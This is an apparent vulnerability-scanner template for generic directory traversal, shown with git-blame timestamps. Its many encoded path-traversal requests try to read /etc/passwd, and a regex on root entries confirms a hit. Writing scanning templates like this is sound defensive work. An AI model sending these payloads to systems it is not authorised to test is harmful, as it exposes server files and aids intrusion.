2020-10-01 18:21:45 +00:00
|
|
|
id: directory-traversal
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: Generic Directory Traversal
|
|
|
|
author: pentest_swissky
|
|
|
|
severity: high
|
|
|
|
description: Detect basic directory traversal leading to a leak of sensitive files.
|
2021-03-18 07:54:36 +00:00
|
|
|
tags: lfi,fuzz
|
2021-04-02 13:54:37 +00:00
|
|
|
|
2020-10-01 18:21:45 +00:00
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/..%5cetc/passwd"
|
|
|
|
- "{{BaseURL}}/..%5c..%5cetc/passwd"
|
|
|
|
- "{{BaseURL}}/..%5c..%5c..%5cetc/passwd"
|
|
|
|
- "{{BaseURL}}/..%5c..%5c..%5c..%5cetc/passwd"
|
|
|
|
- "{{BaseURL}}/..%5c..%5c..%5c..%5c..%5cetc/passwd"
|
|
|
|
- "{{BaseURL}}/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
|
|
|
|
- "{{BaseURL}}/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
|
|
|
|
- "{{BaseURL}}/static/..%5cetc/passwd"
|
|
|
|
- "{{BaseURL}}/static/..%5c..%5cetc/passwd"
|
|
|
|
- "{{BaseURL}}/static/..%5c..%5c..%5cetc/passwd"
|
|
|
|
- "{{BaseURL}}/static/..%5c..%5c..%5c..%5cetc/passwd"
|
|
|
|
- "{{BaseURL}}/static/..%5c..%5c..%5c..%5c..%5cetc/passwd"
|
|
|
|
- "{{BaseURL}}/static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
|
|
|
|
- "{{BaseURL}}/static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
|
|
|
|
- "{{BaseURL}}/./../../../../../../../../../../etc/passwd"
|
2021-02-26 03:30:51 +00:00
|
|
|
- "{{BaseURL}}/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd"
|
|
|
|
- "{{BaseURL}}/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd"
|
|
|
|
- "{{BaseURL}}/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd"
|
|
|
|
- "{{BaseURL}}/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd"
|
|
|
|
- "{{BaseURL}}/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd"
|
|
|
|
- "{{BaseURL}}/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"
|
|
|
|
|
2020-10-01 18:21:45 +00:00
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
|
|
|
- type: regex
|
|
|
|
regex:
|
|
|
|
- "root:[x*]:0:0:"
|
|
|
|
part: body
|